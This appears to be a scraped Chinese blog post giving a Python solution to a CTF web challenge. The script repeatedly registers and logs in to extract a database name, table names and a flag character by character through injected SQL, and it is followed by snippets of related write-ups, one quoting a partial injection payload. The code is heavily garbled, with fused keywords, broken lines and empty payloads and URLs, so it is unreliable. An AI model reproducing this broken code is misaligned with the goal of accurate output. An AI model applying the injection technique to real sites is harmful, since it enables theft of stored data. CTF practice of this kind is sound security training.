題目:
from bs4 import beautifulsoup #html解析器
defgetdatabase()
: database =
''for i in
range(10
):data_database =
#註冊 requests.post(
"",data_database)
login_data=
response=requests.post(
"",login_data)
html=response.text #返回的頁面
soup=beautifulsoup(html,
'html.parser'
) getusername=soup.find_all(
'span')[
0]#獲取使用者名稱
username=getusername.text
ifint(username)==0
:break
database+=
chr(
int(username)
)return database
(getdatabase())
defgettables()
: tables =
''for i in
range(10
):data_tables =
#註冊 requests.post(
"",data_tables)
login_data=
response=requests.post(
"",login_data)
html=response.text #返回的頁面
soup=beautifulsoup(html,
'html.parser'
) getusername=soup.find_all(
'span')[
0]#獲取使用者名稱
username=getusername.text
ifint(username)==0
:break
tables+=
chr(
int(username)
)return tables
'''print(gettables())
'''def
getflag()
: flag =
''for i in
range(40
):data_flag =
#註冊 requests.post(
"",data_flag)
login_data=
response=requests.post(
"",login_data)
html=response.text #返回的頁面
soup=beautifulsoup(html,
'html.parser'
) getusername=soup.find_all(
'span')[
0]#獲取使用者名稱
username=getusername.text
ifint(username)==0
:break
flag+=
chr(
int(username)
)return flag
(getflag(
))flag
本文參照大佬文章
攻防世界 web(高階區)
瞅瞅高階區的,繼續總結。var t fl s a i e var n a h0l n var r g 得到flag 開啟場景鏈結 你可以瀏覽這個 嗎?no,i can t.檢視原始碼什麼都沒有,後面加上index.php。沒用,加上index.phps phps檔案就是php的源 檔案,通常用於提供...
攻防世界web高階區unfinish
有登入就可能有註冊,url欄register.php 先註冊乙個 註冊成功後跳轉到主頁,同時在主頁顯示使用者名稱 唔,鬼刀裡的冰公主,品味不錯,俺喜歡 先試著在註冊介面手注吧 構造插入的註冊語句 payload insert into tables values ema il 0 asci i su...
攻防世界web高階區warmup詳解
檢視原始碼發現source.php 我們直接訪問 發現hint.php 我們再訪問 flag not here,and flag in ffffllllaaaagggg 這裡提示我們flag在ffffllllaaaagggg裡面 那麼我們去看看source.php 直接定義了乙個類,他將file的值...